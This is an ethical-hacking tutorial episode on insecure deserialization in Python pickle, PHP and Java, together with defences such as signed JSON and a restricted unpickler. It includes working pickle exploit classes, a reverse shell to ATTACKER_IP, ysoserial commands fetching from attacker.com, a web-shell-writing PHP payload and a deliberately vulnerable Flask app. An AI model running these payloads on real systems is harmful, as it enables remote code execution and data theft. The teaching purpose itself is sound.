Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
What will I learn
- What serialization and deserialization are and why they're dangerous;
- Python pickle exploitation: crafting malicious serialized objects;
- PHP object injection: manipulating class properties to trigger unintended behavior;
- Java deserialization: the ysoserial toolkit and gadget chains;
- Building a pickle exploit from scratch in our lab;
- Why this vulnerability class is a recurring AI slop problem (Episode 6 callback).
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Your hacking lab from Episode 2;
- Python 3 with Flask (
pip install flask); - The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data (this post)
Solutions to Episode 18 Exercises
Exercise 1 -- SSRF exploitation:
(a) /internal/secrets via SSRF: SUCCESS
curl "localhost:5000/preview?url=http://127.0.0.1:5000/internal/secrets"
Returned: SECRET_API_KEY and DB_PASSWORD
(b) Port scanning via timing:
Port 22 (SSH): responded in 0.01s -> OPEN
Port 80: timed out -> CLOSED
Port 5000: responded in 0.01s -> OPEN (our Flask app)
(c) file:// protocol:
requests library raises InvalidSchema -- file:// not supported.
However, urllib.request.urlopen() DOES support file://, so
applications using urllib are vulnerable to file reading.
The key insight: the requests library accidentally provides some SSRF protection by not supporting file://. But urllib (standard library) does. The default HTTP library choice can make or break SSRF exploitability.
Exercise 2 -- SSRF protection testing:
Bypass results against is_safe_url():
- http://127.0.0.1 -> BLOCKED
- http://[::1] -> BLOCKED (resolves correctly)
- http://2130706433 -> BLOCKED (decimal resolves correctly)
- http://localtest.me -> BLOCKED (DNS resolves to 127.0.0.1)
Remaining gap: DNS rebinding is NOT blocked because DNS resolution
happens at check time (returns safe IP) but the actual HTTP request
resolves DNS again (returns 127.0.0.1). Fix: resolve DNS once and
use the resolved IP for the actual request.
Exercise 3 -- Capital One analysis:
Three changes that would have prevented the breach:
1. AWS IMDSv2 (requires PUT with token before GET -- blocks SSRF)
2. Principle of least privilege: WAF role should NOT have had S3
access to customer data buckets
3. Network segmentation: WAF should not reach metadata endpoint
Learn Ethical Hacking (#19) - Insecure Deserialization
Remember Episode 6 (AI Slop Epidemic) when we showed AI generating pickle.load() on untrusted data and said "this is catastrophic"? We're about to spend an entire episode understanding exactly WHY.
Every vulnerability we've covered since episode 11 exploits the boundary between user input and application logic. SQL injection (episodes 12-13) injects database commands through input fields. XSS (episodes 14-15) injects browser code through input fields. CSRF (episode 16) weaponizes the browser's trust in cookies. SSRF (episode 18) weaponizes the server's trust in itself. In every case, the attacker manipulates HOW the application processes data.
Insecure deserialization is different. The attacker doesn't manipulate how the application processes data -- they manipulate the data so it IS code. The application reads what it thinks is a data structure (a dictionary, an object, a session) and inadvertently executes arbitrary commands. The boundary between data and code dissolves completely.
Data becomes code. And dat is the most dangerous transformation in security.
Serialization 101
First, some terminology. Serialization converts an in-memory object into a format that can be stored or transmitted -- bytes, strings, JSON, whatever. Deserialization converts it back into an in-memory object. Every application does this constantly: storing sessions, caching objects, sending data over the wire, passing messages between services.
The critical distinction is between data-only formats and code-capable formats:
import json
import pickle
# A simple Python object
user = {'name': 'Scipio', 'role': 'admin', 'score': 42}
# === JSON serialization -- SAFE (data only, no code) ===
json_data = json.dumps(user)
print(f"JSON: {json_data}")
# {"name": "Scipio", "role": "admin", "score": 42}
# JSON can only represent data: strings, numbers, arrays, objects.
# It cannot represent code, function calls, or object instantiation.
# That is what makes it safe.
# === Pickle serialization -- DANGEROUS (can embed code) ===
pickle_data = pickle.dumps(user)
print(f"Pickle: {len(pickle_data)} bytes of binary data")
# Pickle can represent ANYTHING Python can do -- including
# executing system commands. That is what makes it dangerous.
# We showed the exact pickle.load() vulnerability in Episode 6.
JSON, MessagePack, Protocol Buffers, YAML (mostly) -- these are data-only. They can represent strings, numbers, lists, and dictionaries. They cannot represent function calls, class instantiation, or system commands. Deserializing a JSON blob can never execute code, no matter how malicious the input is. The worst that happens is you get unexpected data values.
Python's pickle, Java's ObjectInputStream, PHP's unserialize(), Ruby's Marshal, .NET's BinaryFormatter -- these are code-capable. They reconstruct full objects, including calling constructors, invoking magic methods, and (in pickle's case) executing arbitrary callables. Deserializing malicious input in these formats can do ANYTHING the application has permission to do ;-)
The Pickle Protocol: How Python Executes Your Data
To understand pickle exploitation, you need to understand what pickle actually does. Pickle has its own bytecode instruction set -- a small stack-based virtual machine. When you call pickle.loads(), Python executes those bytecode instructions to reconstruct the object. One of those instructions is REDUCE, which calls an arbitrary callable with arbitrary arguments.
The key to exploitation is the __reduce__ method. When Python pickles an object, it calls __reduce__ to determine how to serialize it. When it UNpickles, it uses those instructions to reconstruct it. If __reduce__ returns a tuple of (callable, args), Python calls callable(*args) during deserialization:
import pickle
import os
class Exploit:
"""When unpickled, this object executes a system command."""
def __reduce__(self):
# __reduce__ tells pickle HOW to recreate this object.
# We tell it to call os.system() with our command.
# During deserialization, Python will execute:
# os.system('id; whoami')
return (os.system, ('id; whoami',))
# Create the malicious pickle payload
payload = pickle.dumps(Exploit())
print(f"Payload size: {len(payload)} bytes")
print(f"Payload (hex): {payload.hex()[:80]}...")
# When a vulnerable application deserializes this:
# result = pickle.loads(payload)
# It executes: os.system('id; whoami')
# Output: uid=1000(webapp) gid=1000(webapp) groups=1000(webapp)
That's it. No buffer overflow, no memory corruption, no race condition. You define a class with __reduce__, pickle it, and anyone who unpickles it runs your command. The payload is a few dozen bytes. The impact is arbitrary code execution.
Let's look at what the pickle bytecode actually contains:
import pickle
import pickletools
import os
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
# Disassemble the pickle to see what instructions it contains
print("=== Pickle bytecode disassembly ===")
pickletools.dis(payload)
# Output (simplified):
# GLOBAL 'nt system' (or 'posix system' on Linux)
# MARK
# SHORT_BINUNICODE 'id'
# TUPLE
# REDUCE <-- THIS is where the code executes
# STOP
The GLOBAL opcode loads a callable by module and name. REDUCE calls it with the arguments on the stack. The pickle VM is Turing-complete (seriously) -- you can construct loops, conditionals, and arbitrarily complex computation using pickle opcodes alone. Researchers have built entire exploit frameworks using nothing but pickle bytecode.
Building a Vulnerable Lab
Let's build a web application that uses pickle for session storage -- a pattern that is disturbingly common in real codebases:
#!/usr/bin/env python3
"""Vulnerable application using pickle for session cookies. LAB ONLY."""
from flask import Flask, request, make_response
import pickle
import base64
app = Flask(__name__)
@app.route('/')
def index():
session_cookie = request.cookies.get('session_data')
if session_cookie:
try:
# VULNERABLE: deserializing untrusted cookie data
session = pickle.loads(base64.b64decode(session_cookie))
return f"Welcome back, {session.get('username', 'unknown')}! Role: {session.get('role', 'user')}"
except Exception as e:
return f"Session error: {e}"
# First visit -- set a normal session cookie
session = {'username': 'guest', 'role': 'user', 'visits': 1}
resp = make_response("Welcome, guest! Session cookie set.")
cookie_data = base64.b64encode(pickle.dumps(session)).decode()
resp.set_cookie('session_data', cookie_data)
return resp
@app.route('/admin')
def admin():
session_cookie = request.cookies.get('session_data')
if session_cookie:
session = pickle.loads(base64.b64decode(session_cookie))
if session.get('role') == 'admin':
return "ADMIN PANEL: User count: 14,293 | Revenue: $892,100"
return "Access denied. Admin only.", 403
app.run(host='0.0.0.0', port=5000)
Now the exploit. We craft a malicious cookie that executes a command when the server deserializes it:
#!/usr/bin/env python3
"""Pickle exploit generator -- creates malicious session cookies. LAB ONLY."""
import pickle
import base64
import os
import sys
class FileCreator:
"""Creates a file on the server to prove code execution."""
def __reduce__(self):
return (os.system, ('touch /tmp/pickle-pwned && echo PWNED > /tmp/pickle-pwned',))
class FileReader:
"""Reads /etc/passwd and writes it to a file we can retrieve."""
def __reduce__(self):
return (os.system, ('cp /etc/passwd /tmp/passwd-stolen',))
class ReverseShell:
"""Opens a reverse shell back to the attacker."""
def __reduce__(self):
cmd = "python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));subprocess.call([\"/bin/sh\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'"
return (os.system, (cmd,))
# Generate exploit cookies
exploits = {
'file_create': FileCreator(),
'file_read': FileReader(),
'reverse_shell': ReverseShell(),
}
for name, exploit in exploits.items():
cookie = base64.b64encode(pickle.dumps(exploit)).decode()
print(f"\n=== {name} ===")
print(f"Cookie value: {cookie[:60]}...")
print(f"Full length: {len(cookie)} characters")
# Demonstrate the file_create exploit
print("\n=== Testing file_create exploit ===")
print("Use this curl command against the vulnerable app:")
cookie = base64.b64encode(pickle.dumps(FileCreator())).decode()
print(f'curl -b "session_data={cookie}" http://localhost:5000/')
print("Then check: ls -la /tmp/pickle-pwned")
# Start the vulnerable app
python3 pickle_lab.py &
# Normal use -- get a legitimate session cookie
curl -c cookies.txt http://localhost:5000/
# Returns: "Welcome, guest! Session cookie set."
# Generate the exploit cookie
python3 pickle_exploit.py
# Send the malicious cookie
curl -b "session_data=EXPLOIT_COOKIE_HERE" http://localhost:5000/
# The server deserializes the cookie -> os.system() executes
# Check for proof: cat /tmp/pickle-pwned
# Output: PWNED
From "user visits website" to "attacker has code execution on the server" -- through a cookie. The server reads what it thinks is session data and instead runs an arbitrary system command. The HTTP request looks completely normal. The cookie is a valid base64 string. Nothing about the request would trigger a WAF or IDS. The only thing unusual is the content of the deserialized data, and by the time the server knows what's in it, the command has already executed.
Analyzing Pickles Without Executing Them
You should never pickle.loads() data you don't trust. But what if you need to inspect a pickle payload without running it? The pickletools module can disassemble pickle bytecode safely:
#!/usr/bin/env python3
"""
Pickle payload analyzer -- inspects pickles WITHOUT executing them.
Flags dangerous operations (GLOBAL loading os, subprocess, etc.)
"""
import pickletools
import base64
import sys
import io
DANGEROUS_MODULES = [
'os', 'subprocess', 'commands', 'pty', 'shutil',
'importlib', 'builtins', 'sys', 'code', 'codeop',
'compile', 'execfile', 'eval', 'exec',
'socket', 'http', 'urllib', 'webbrowser',
]
def analyze_pickle(data, label=""):
"""Disassemble and analyze a pickle payload."""
print(f"\n{'='*60}")
if label:
print(f"Analyzing: {label}")
print(f"Payload size: {len(data)} bytes")
print(f"{'='*60}")
# Capture disassembly
output = io.StringIO()
try:
pickletools.dis(data, output)
except Exception as e:
print(f"[-] Disassembly failed: {e}")
return
disasm = output.getvalue()
print(disasm)
# Check for dangerous operations
dangers = []
for line in disasm.split('\n'):
if 'GLOBAL' in line or 'INST' in line or 'STACK_GLOBAL' in line:
for mod in DANGEROUS_MODULES:
if mod in line.lower():
dangers.append(line.strip())
if dangers:
print(f"\n[!!!] DANGEROUS OPERATIONS DETECTED:")
for d in dangers:
print(f" {d}")
print(f"\n[!!!] This pickle would execute code if loaded!")
else:
print(f"\n[OK] No obviously dangerous operations found.")
print(f" (Still don't trust it -- pickle is inherently unsafe)")
# Demo: analyze a benign pickle
import pickle, os
benign = pickle.dumps({'username': 'guest', 'role': 'user'})
analyze_pickle(benign, "Benign session data")
# Demo: analyze a malicious pickle
class Evil:
def __reduce__(self):
return (os.system, ('id',))
malicious = pickle.dumps(Evil())
analyze_pickle(malicious, "Malicious payload")
=== Analyzing: Benign session data ===
0: \x80 PROTO 4
2: \x95 FRAME
...
GLOBAL loads: NONE
[OK] No obviously dangerous operations found.
=== Analyzing: Malicious payload ===
0: \x80 PROTO 4
...
GLOBAL 'posix system'
SHORT_BINUNICODE 'id'
REDUCE
[!!!] DANGEROUS OPERATIONS DETECTED:
GLOBAL 'posix system'
[!!!] This pickle would execute code if loaded!
This is the safe way to inspect pickles. You never call pickle.loads() -- you just disassemble the bytecode and look for dangerous opcodes. In a real pentest, if you find an endpoint that accepts pickled data (cookies, API parameters, cached objects, message queues), you'd first craft a benign pickle to verify deserialization happens, then swap in an exploit pickle.
PHP Object Injection
PHP's unserialize() has the same fundamental problem, but the exploitation mechanism is different. PHP doesn't have an equivalent of __reduce__ that directly calls functions. Instead, PHP calls magic methods like __wakeup(), __destruct(), __toString(), and __call() when objects are unserialized and used. The attacker exploits existing classes in the application that have dangerous operations in these magic methods:
<?php
// Existing class in the application's codebase
class FileManager {
public $logfile;
public $content;
// Called automatically when the object is destroyed
function __destruct() {
// Intended use: write log entries
file_put_contents($this->logfile, $this->content, FILE_APPEND);
}
}
// Normal use: $fm = new FileManager();
// $fm->logfile = '/var/log/app.log';
// $fm->content = "User logged in\n";
// Attacker crafts serialized FileManager with:
// logfile = "/var/www/html/shell.php"
// content = ""
$evil_serialized = 'O:11:"FileManager":2:{s:7:"logfile";s:25:"/var/www/html/shell.php";s:7:"content";s:34:"";}';
// When the application does: $obj = unserialize($user_input);
// PHP creates a FileManager object with attacker-controlled properties
// When the object is garbage-collected, __destruct() fires
// file_put_contents writes a web shell to the web root
// Attacker visits: http://target.com/shell.php?cmd=id
// Game over.
?>
The attacker doesn't inject NEW code into the application. They REUSE existing classes in unexpected ways -- setting properties to values the original developer never anticipated. The FileManager class was meant to write log files. The attacker points it at the web root with PHP code as the "log content". The class does exactly what it's programmed to do. It just does it with attacker-controlled inputs.
This technique is called a POP chain (Property-Oriented Programming). It's the object-oriented equivalent of ROP (Return-Oriented Programming) in binary exploitation. In both cases, the attacker doesn't inject code -- they chain together existing code fragments (gadgets in ROP, magic methods in POP) to achieve arbitrary behavior. Finding exploitable POP chains requires deep knowledge of the target application's class hierarchy, which is why PHP deserialization vulns are common in large frameworks like Laravel, Symfony, and WordPress plugins where dozens of classes with exploitable magic methods are available.
Java Deserialization: The Enterprise Apocalypse
Java's ObjectInputStream.readObject() is arguably the most impactful deserialization vulnerability class in the history of software. The Java ecosystem's love of object serialization, combined with massive enterprise codebases full of exploitable class hierarchies, created an attack surface that affected nearly every major Java application.
The ysoserial tool generates payloads for dozens of known "gadget chains" -- sequences of Java method calls triggered during deserialization that culminate in arbitrary command execution:
# Generate a Java deserialization payload targeting Apache Commons Collections
java -jar ysoserial.jar CommonsCollections1 'touch /tmp/java-pwned' > payload.bin
# Generate payload for Spring framework gadget chain
java -jar ysoserial.jar Spring1 'wget http://attacker.com/shell.sh -O /tmp/s.sh' > payload.bin
# Generate payload for Hibernate ORM chain
java -jar ysoserial.jar Hibernate1 'bash -c {echo,BASE64_REVERSE_SHELL}|{base64,-d}|bash' > payload.bin
# If the target application deserializes this binary data with
# ObjectInputStream.readObject(), the command executes on the server.
The devastation caused by Java deserialization bugs is hard to overstate:
CVE-2015-4852 (Apache Commons Collections): Affected nearly EVERY Java application that included commons-collections on the classpath -- which was most of them. WebLogic, JBoss, Jenkins, WebSphere, Tomcat, Spring -- all vulnerable. The patch wasn't straightforward because removing the library broke functionality across entire application stacks.
CVE-2017-5638 (Apache Struts): Triggered the Equifax breach -- 147 million records stolen. The vulnerability was in the Content-Type header parser, which deserialized OGNL expressions (a form of code execution through deserialization of expression language). Equifax had the patch available for TWO MONTHS before the breach and didn't apply it.
Jenkins deserialization (CVE-2017-1000353): Allowed unauthenticated remote code execution on Jenkins CI servers. Jenkins uses Java serialization extensively for its remoting protocol. Any Jenkins instance exposed to the network was vulnerable. Thousands of build servers compromised.
Having said that, the Java ecosystem has responded. Modern Java (9+) has the ObjectInputFilter API that lets you whitelist which classes can be deserialized. Libraries like Apache Commons Collections have been patched. Many frameworks have moved away from Java native serialization toward JSON (Jackson, Gson). But the legacy attack surface is enormous, and enterprise applications that were built in the 2010s and never fully modernized are still running in production with vulnerable deserialization endpoints ;-)
The AI Slop Connection
This is where Episode 6 comes full circle. When you ask an AI code assistant to generate code for "saving application state", "caching objects between requests", "passing Python objects between services", or "storing user preferences" -- the AI reaches for pickle. It's the simplest solution. It handles arbitrary Python objects. It's in the standard library. And it's catastrophically unsafe for any data that comes from an untrusted source.
The AI doesn't distinguish between "serializing data I created" (relativley safe, as long as the storage medium isn't attacker-writable) and "deserializing data from an untrusted source" (code execution). From the AI's perspective, pickle.dumps() and pickle.loads() are symmetric operations -- one saves, one loads. The security asymmetry is invisible.
Here's what makes this particularly insidious: the vulnerable code WORKS. The session system works. The cache works. The message queue works. Every functional test passes. The pickle-based session stores and retrieves user data correctly. The vulnerability is completely invisible during development and testing because the developer is the only one providing the data. It only manifests when an attacker provides THEIR data -- a malicious pickle payload where the application expected a dict.
This same pattern appears in every language:
- Python:
pickle.loads(user_input)-- arbitrary code execution - PHP:
unserialize($user_input)-- object injection via POP chains - Java:
new ObjectInputStream(user_input).readObject()-- gadget chain execution - Ruby:
Marshal.load(user_input)-- arbitrary code execution - .NET:
BinaryFormatter.Deserialize(user_input)-- arbitrary code execution
Every one of these is generated by AI code assistants in contexts where JSON would be the safe (and correct) choice.
Safe Alternatives
The fix is conceptually simple: use data-only serialization formats for untrusted data:
import json
import hmac
import hashlib
SECRET_KEY = b'your-secret-key-here-use-os.urandom(32)-in-production'
# === Safe state storage using JSON ===
def save_session(data, secret=SECRET_KEY):
"""Serialize session data safely using JSON + HMAC signing."""
json_bytes = json.dumps(data, sort_keys=True).encode()
signature = hmac.new(secret, json_bytes, hashlib.sha256).hexdigest()
return json_bytes.decode() + '.' + signature
def load_session(signed_data, secret=SECRET_KEY):
"""Deserialize session data safely -- verify signature first."""
try:
json_str, signature = signed_data.rsplit('.', 1)
expected = hmac.new(secret, json_str.encode(), hashlib.sha256).hexdigest()
if not hmac.compare_digest(signature, expected):
return None # Tampered -- reject
return json.loads(json_str)
except (ValueError, KeyError):
return None
# Usage
session = {'username': 'scipio', 'role': 'user'}
signed = save_session(session)
print(f"Signed session: {signed[:60]}...")
# Legitimate load
loaded = load_session(signed)
print(f"Loaded: {loaded}") # {'username': 'scipio', 'role': 'user'}
# Tampered load (attacker modifies the JSON)
tampered = signed.replace('"user"', '"admin"')
loaded = load_session(tampered)
print(f"Tampered: {loaded}") # None -- signature mismatch, rejected
JSON can never execute code. The HMAC signature prevents tampering. Even if an attacker intercepts the signed session, they can't modify it without the secret key. And even if they could somehow forge the HMAC, the worst possible outcome is unexpected data values -- never code execution. This is a fundamentally different security posture from pickle, where the best case is "it works" and the worst case is "arbitrary RCE."
If you absolutely MUST use native serialization (some legitimate use cases exist, like IPC between trusted processes on the same machine), sign the data with HMAC and verify the signature BEFORE deserializing:
import pickle
import hmac
import hashlib
SECRET = b'internal-process-secret'
def safe_pickle_dump(obj, secret=SECRET):
"""Pickle with HMAC signature -- only for trusted internal use."""
data = pickle.dumps(obj)
sig = hmac.new(secret, data, hashlib.sha256).digest()
return sig + data
def safe_pickle_load(signed_data, secret=SECRET):
"""Verify HMAC before unpickling -- rejects tampered data."""
sig = signed_data[:32]
data = signed_data[32:]
expected = hmac.new(secret, data, hashlib.sha256).digest()
if not hmac.compare_digest(sig, expected):
raise ValueError("HMAC verification failed -- data tampered")
return pickle.loads(data) # Only deserialize AFTER verification
The HMAC verification MUST happen before the pickle.loads() call. If an attacker can't forge the HMAC, they can't get their malicious pickle through to the deserializer. This doesn't make pickle safe for untrusted input -- it makes pickle safe for data that you signed yourself. The distinction matters.
Restricted Deserialization: The RestrictedUnpickler
Python provides one more defense mechanism -- the RestrictedUnpickler class that lets you whitelist which modules and classes pickle is allowed to instantiate:
import pickle
import io
class RestrictedUnpickler(pickle.Unpickler):
"""Only allows deserializing basic Python types."""
ALLOWED_CLASSES = {
('builtins', 'set'),
('builtins', 'frozenset'),
('collections', 'OrderedDict'),
('datetime', 'datetime'),
('datetime', 'date'),
}
def find_class(self, module, name):
if (module, name) in self.ALLOWED_CLASSES:
return super().find_class(module, name)
raise pickle.UnpicklingError(
f"Blocked: {module}.{name} -- not in whitelist"
)
def restricted_loads(data):
return RestrictedUnpickler(io.BytesIO(data)).load()
# Test with benign data
import pickle
safe_data = pickle.dumps({'key': 'value', 'number': 42})
print(restricted_loads(safe_data)) # {'key': 'value', 'number': 42}
# Works -- dicts, strings, and ints are basic types (no find_class needed)
# Test with malicious payload
import os
class Evil:
def __reduce__(self):
return (os.system, ('id',))
evil_data = pickle.dumps(Evil())
try:
restricted_loads(evil_data)
except pickle.UnpicklingError as e:
print(f"BLOCKED: {e}")
# BLOCKED: posix.system -- not in whitelist
This is significantly safer than raw pickle.loads() because the exploit can't load os.system or any other dangerous callable. Having said that, the whitelist approach has limitations. The attacker might find creative ways to chain whitelisted classes into exploits, and maintaining a whitelist that's both permissive enough to be useful AND restrictive enough to be safe is harder than it sounds. JSON is still the better choice for untrusted data -- a RestrictedUnpickler is a defense-in-depth measure, not a primary defense.
Defense Summary
- Never deserialize untrusted data with pickle, Java ObjectInputStream, PHP unserialize(), Ruby Marshal, or .NET BinaryFormatter
- Use JSON (or MessagePack, Protocol Buffers) for any data crossing trust boundaries -- between client and server, between services, in cookies, in message queues
- If you MUST use native serialization: sign the data with HMAC and verify the signature BEFORE deserializing
- Restrict deserialization to specific classes -- Python's RestrictedUnpickler, Java's ObjectInputFilter, PHP's
unserialize($data, ['allowed_classes' => ['Session']]) - Monitor for deserialization attacks -- unexpected classes in deserialized data, pickles that fail to load, spikes in deserialization errors
Real-World Impact
The scale of insecure deserialization vulnerabilities is staggering:
- Apache Struts/Equifax (2017): 147 million records, $1.4 billion total cost. Patch was available 2 months before the breach.
- Apache Commons Collections (2015): Affected almost every Java enterprise application in existence. The CVE list for deserialization in Java alone is hundredds of entries long.
- Magento (e-commerce): PHP object injection in the admin panel allowed remote code execution. Thousands of online stores compromised, credit card data stolen.
- Drupal (2019): PHP deserialization bug in the core REST module. One request to the API -- full server compromise.
- Ruby on Rails (2013): YAML deserialization bug in the parameter parser. YAML's
!!ruby/objecttag allowed arbitrary object instantiation, leading to RCE on any Rails app.
Every one of these was a case where data crossed a trust boundary and was deserialized using a code-capable format. The fix was always the same: use a data-only format, or validate before deserializing. The same lesson, learned over and over, in language after language, framework after framework.
We've now covered the major web application vulnerability classes: injection attacks (SQL injection, XSS), trust-boundary attacks (CSRF, SSRF, authentication bypass), and data-format attacks (insecure deserialization). Each one exploits a different aspect of how applications handle input, but they all share the same root cause: trusting data that an attacker controls. The web attack surface is deep, and applications also accept user-supplied files -- uploads that can contain executable payloads, malware, or path traversal sequences that overwrite critical system files. That's a whole different category of input trust that we haven't explored yet.
Exercises
Exercise 1: Set up the vulnerable Flask pickle application from this episode. Create three different pickle exploits: (a) one that creates a file on the server (touch /tmp/pickle-pwned), (b) one that reads /etc/passwd and writes it to /tmp/passwd-stolen, (c) one that opens a reverse shell back to your Kali VM (start a listener with nc -lvnp 4444 first). For each exploit, generate the base64-encoded cookie, send it with curl, and verify the result. Document the payload creation and verification in ~/lab-notes/deserialization-attacks.md.
Exercise 2: Write a Python script called pickle_analyzer.py that takes a base64-encoded pickle payload as a command-line argument and analyzes it WITHOUT executing it. Use pickletools.dis() to disassemble the pickle opcodes, then scan the disassembly for dangerous patterns: GLOBAL opcodes that load modules like os, subprocess, socket, builtins. Test it against both benign pickles (a serialized dictionary) and malicious pickles (your exploits from Exercise 1). The script should output "SAFE: no dangerous operations" or "DANGEROUS: [list of flagged operations]". Save as ~/pentest-tools/pickle_analyzer.py.
Exercise 3: Build a "before and after" Flask application. The "before" version uses pickle for session storage in cookies (vulnerable). The "after" version uses JSON with HMAC signing (secure). Demonstrate that: (a) the pickle version is exploitable -- a crafted cookie executes commands on the server, (b) the JSON version is immune to code execution -- even a modified cookie can only produce data, never code, (c) the HMAC signature prevents tampering -- a modified JSON payload is rejected. Write a comparison document explaining why each change matters. Save everything in ~/deserialization-lab/.